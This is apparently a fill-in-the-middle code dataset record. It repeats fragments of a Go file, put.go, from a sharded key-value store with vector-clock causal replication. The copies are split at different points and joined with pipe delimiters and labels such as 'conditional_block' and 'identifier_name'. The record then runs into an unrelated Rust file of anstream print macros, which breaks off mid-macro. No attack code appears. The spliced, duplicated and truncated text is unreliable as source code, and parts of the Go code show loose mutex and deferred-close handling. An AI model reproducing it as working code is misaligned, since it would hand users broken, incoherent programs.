Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr |
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
}
| {
continue
} | conditional_block |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func | (senderVC []int, replicaVC []int, view []string) bool {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
		} else if i != senderID && senderVC[i] > replicaVC[i] { //if something other than the sender has incremented its clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
	//Otherwise the sender's slot is ahead by exactly one and no other slot is ahead, so the message can be delivered
return true
}
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
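// exampleUpdateVC is an illustrative sketch (added for clarity; the addresses are made up):
// merging is an element-wise max over the first len(view) entries, so the sender clock's
// trailing index element is ignored here.
func exampleUpdateVC() {
	view := []string{"a:8085", "b:8085", "c:8085"}
	merged := updateVC([]int{2, 0, 1, 0}, []int{1, 1, 1}, view)
	fmt.Println(merged) // [2 1 1]
}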
//compareVC returns whichever of the two vector clocks has the larger component sum over the
//view, i.e. the clock that reflects more delivered events.
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// ShardPutStore stores the key-value pair locally when the key hashes to this node's shard id;
// otherwise it forwards the request to one of the nodes in the shard that the key hashes to.
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
//If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
					c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
					c.JSON(http.StatusCreated, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr {
continue
}
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
//ReplicatePut Endpoint for replication
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
}
| canDeliver | identifier_name |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func canDeliver(senderVC []int, replicaVC []int, view []string) bool |
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC returns whichever of the two vector clocks has the larger component sum over the
//view, i.e. the clock that reflects more delivered events.
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
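// exampleCompareVC is an illustrative sketch (added for clarity; the addresses are made up):
// compareVC keeps whichever clock has the larger component sum over the view.
func exampleCompareVC() {
	view := []string{"a:8085", "b:8085", "c:8085"}
	fmt.Println(compareVC([]int{3, 0, 0}, []int{1, 1, 0}, view)) // [3 0 0], since 3 > 2
}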
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// ShardPutStore stores the key-value pair locally when the key hashes to this node's shard id;
// otherwise it forwards the request to one of the nodes in the shard that the key hashes to.
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
//If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
// if the newShardId matches that of the current node's shard id, then we can add to the store, & reply back
if shardId == s.CurrentShard {
if _, exists := store[key]; exists {
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
					c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
} else { // otherwise we insert a new key-value pair //
Mu.Mutex.Lock()
store[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
fmt.Printf("******CURRENT STORE: %v**********", store)
c.JSON(http.StatusCreated, gin.H{"message": "Added successfully", "causal-metadata": d.CausalMetadata[0:len(view.PersonalView)], "shard-id": s.CurrentShard})
}
} else { // otherwise we must create a new request and forward it to one of the members with the given <shard-id>
Mu.Mutex.Lock()
fmt.Printf("*********s.shardMembers[shardId] IN ELSE: %v******", s.ShardMembers[shardId])
for index, member := range s.ShardMembers[shardId] {
if member == view.SocketAddr {
continue
}
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+s.ShardMembers[shardId][index]+"/key-value-store/"+key, bytes.NewBuffer(jsonData))
//fmt.Printf("********DATA BEING SENT: %v********", data)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
Mu.Mutex.Unlock()
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil { // if an error occurs, assume the node is dead, so continue attempting to send to another node in the provided shard
continue
}
body, _ := ioutil.ReadAll(response.Body)
defer response.Body.Close()
// jsonData = json.RawMessage(body)
json.Unmarshal(body, &fn)
fmt.Printf("********CHECK BODY BEING SENT: %v********", string(body[:]))
c.JSON(response.StatusCode, gin.H{"message": fn.Message, "causal-metadata": fn.CausalMetadata, "shard-id": fn.ShardId})
break // if we managed to receive a response back after forwarding, don't forward to other nodes in that same shard
}
Mu.Mutex.Unlock()
}
}
// send nodes in the current shard the key as well
Mu.Mutex.Lock()
if shardId == s.CurrentShard {
for _, member := range s.ShardMembers[s.CurrentShard] {
if member == view.SocketAddr { // don't send a PUT request to self
continue
}
c.Request.URL.Host = member
c.Request.URL.Scheme = "http"
data := &StoreVal{Value: d.Value, CausalMetadata: d.CausalMetadata}
jsonData, _ := json.Marshal(data)
fwdRequest, err := http.NewRequest("PUT", "http://"+member+"/key-value-store-r/"+key, bytes.NewBuffer(jsonData))
if err != nil {
http.Error(c.Writer, err.Error(), http.StatusInternalServerError)
return
}
Mu.Mutex.Unlock()
fwdRequest.Header = c.Request.Header
httpForwarder := &http.Client{Timeout: 5 * time.Second}
response, err := httpForwarder.Do(fwdRequest)
Mu.Mutex.Lock()
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{})
break
}
defer response.Body.Close()
}
}
Mu.Mutex.Unlock()
})
}
// ReplicatePut registers the endpoint that other replicas in the shard call to replicate PUTs.
func ReplicatePut(r *gin.Engine, dict map[string]StoreVal, localAddr int, view []string, currVC []int, s *SharedShardInfo) {
var d StoreVal
r.PUT("/key-value-store-r/:key", func(c *gin.Context) {
key := c.Param("key")
body, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(body[:])
fmt.Printf("STRBODY: %s\n", strBody)
json.Unmarshal(body, &d)
fmt.Printf("VALUE: %s\n", d.Value)
fmt.Printf("CAUSAL METADATA REPLICATION: %v\n", d.CausalMetadata)
defer c.Request.Body.Close()
if strBody == "{}" {
c.JSON(http.StatusBadRequest, gin.H{"error": "Value is missing", "message": "Error in PUT"})
} else if len(key) > keyLimit {
c.JSON(http.StatusBadRequest, gin.H{"error": "Key is too long", "message": "Error in PUT"})
} else {
// if a key-value pair already exists, then replace the old value //
if _, exists := dict[key]; exists {
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
//get updated kvstore from other replicas
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
} else { // otherwise we insert a new key-value pair //
if canDeliver(d.CausalMetadata, currVC, view) {
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
} else {
updateKvStore(view, dict, currVC, s)
d.CausalMetadata = updateVC(d.CausalMetadata, currVC, view)
currVC = d.CausalMetadata
Mu.Mutex.Lock()
dict[key] = StoreVal{d.Value, d.CausalMetadata}
Mu.Mutex.Unlock()
c.JSON(http.StatusOK, gin.H{"message": "Updated successfully", "replaced": true, "causal-metadata": d.CausalMetadata})
}
}
}
fmt.Printf("*******AFTER REPLICATION STORE: %v*******", dict)
})
}
| {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
} else if i != senderID && senderVC[i] > replicaVC[i] { //if something else than the sender incremented clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
// Otherwise the clocks differ only in the sender's slot, and by exactly 1, so this is the next write expected from that sender
return true
}
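// exampleCanDeliver is a hypothetical illustration of the rule above. The replica
// sits at [1 0 0]; a write from the node at index 1 stamped [1 1 0] is deliverable
// (exactly one ahead in the sender's slot), while [2 1 0] from the same sender is
// not, because the replica has not yet seen the first node's second write.
// The view addresses are made up for illustration.
func exampleCanDeliver() {
	view := []string{"node-a:8085", "node-b:8085", "node-c:8085"} // made-up addresses
	replica := []int{1, 0, 0}
	deliverable := []int{1, 1, 0, 1} // clock entries plus the sender index appended, as ReplicatePut receives them
	tooFarAhead := []int{2, 1, 0, 1}
	fmt.Println(canDeliver(deliverable, replica, view)) // true
	fmt.Println(canDeliver(tooFarAhead, replica, view)) // false
}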
macros.rs | /// Prints to [`stdout`][crate::stdout].
///
/// Equivalent to the [`println!`] macro except that a newline is not printed at
/// the end of the message.
///
/// Note that stdout is frequently line-buffered by default so it may be
/// necessary to use [`std::io::Write::flush()`] to ensure the output is emitted
/// immediately.
///
/// **NOTE:** The `print!` macro will lock the standard output on each call. If you call
/// `print!` within a hot loop, this behavior may be the bottleneck of the loop.
/// To avoid this, lock stdout with [`AutoStream::lock`][crate::AutoStream::lock]:
/// ```
/// # #[cfg(feature = "auto")] {
/// use std::io::Write as _;
///
/// let mut lock = anstream::stdout().lock();
/// write!(lock, "hello world").unwrap();
/// # }
/// ```
///
/// Use `print!` only for the primary output of your program. Use
/// [`eprint!`] instead to print error and progress messages.
///
/// # Panics
///
/// Panics if writing to `stdout` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stdout can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use std::io::Write as _;
/// use anstream::print;
/// use anstream::stdout;
///
/// print!("this ");
/// print!("will ");
/// print!("be ");
/// print!("on ");
/// print!("the ");
/// print!("same ");
/// print!("line ");
///
/// stdout().flush().unwrap();
///
/// print!("this string has a newline, why not choose println! instead?\n");
///
/// stdout().flush().unwrap();
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! print {
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stdout();
match ::std::write!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Prints to [`stdout`][crate::stdout], with a newline.
///
/// On all platforms, the newline is the LINE FEED character (`\n`/`U+000A`) alone
/// (no additional CARRIAGE RETURN (`\r`/`U+000D`)).
///
/// This macro uses the same syntax as [`format!`], but writes to the standard output instead.
/// See [`std::fmt`] for more information.
///
/// **NOTE:** The `println!` macro will lock the standard output on each call. If you call
/// `println!` within a hot loop, this behavior may be the bottleneck of the loop.
/// To avoid this, lock stdout with [`AutoStream::lock`][crate::AutoStream::lock]:
/// ```
/// # #[cfg(feature = "auto")] {
/// use std::io::Write as _;
///
/// let mut lock = anstream::stdout().lock();
/// writeln!(lock, "hello world").unwrap();
/// # }
/// ```
///
/// Use `println!` only for the primary output of your program. Use
/// [`eprintln!`] instead to print error and progress messages.
///
/// # Panics
///
/// Panics if writing to `stdout` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stdout can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use anstream::println;
///
/// println!(); // prints just a newline
/// println!("hello there!");
/// println!("format {} arguments", "some");
/// let local_variable = "some";
/// println!("format {local_variable} arguments");
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! println {
() => {
$crate::print!("\n")
};
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stdout();
match ::std::writeln!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Prints to [`stderr`][crate::stderr].
///
/// Equivalent to the [`print!`] macro, except that output goes to
/// `stderr` instead of `stdout`. See [`print!`] for
/// example usage.
///
/// Use `eprint!` only for error and progress messages. Use `print!`
/// instead for the primary output of your program.
///
/// # Panics
///
/// Panics if writing to `stderr` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stderr can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use anstream::eprint;
///
/// eprint!("Error: Could not complete task");
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! eprint {
($($arg:tt)*) => {{
use std::io::Write as _;
let mut stream = $crate::stderr();
match ::std::write!(&mut stream, $($arg)*) {
Err(e) if e.kind() != ::std::io::ErrorKind::BrokenPipe => {
::std::panic!("failed printing to stdout: {e}");
}
Err(_) | Ok(_) => {}
}
}};
}
/// Prints to [`stderr`][crate::stderr], with a newline.
///
/// Equivalent to the [`println!`] macro, except that output goes to
/// `stderr` instead of `stdout`. See [`println!`] for
/// example usage.
///
/// Use `eprintln!` only for error and progress messages. Use `println!`
/// instead for the primary output of your program.
///
/// # Panics
///
/// Panics if writing to `stderr` fails for any reason **except** broken pipe.
///
/// Writing to non-blocking stderr can cause an error, which will lead
/// this macro to panic.
///
/// # Examples
///
/// ```
/// # #[cfg(feature = "auto")] {
/// use anstream::eprintln;
///
/// eprintln!("Error: Could not complete task");
/// # }
/// ```
#[cfg(feature = "auto")]
#[macro_export]
macro_rules! eprintln {
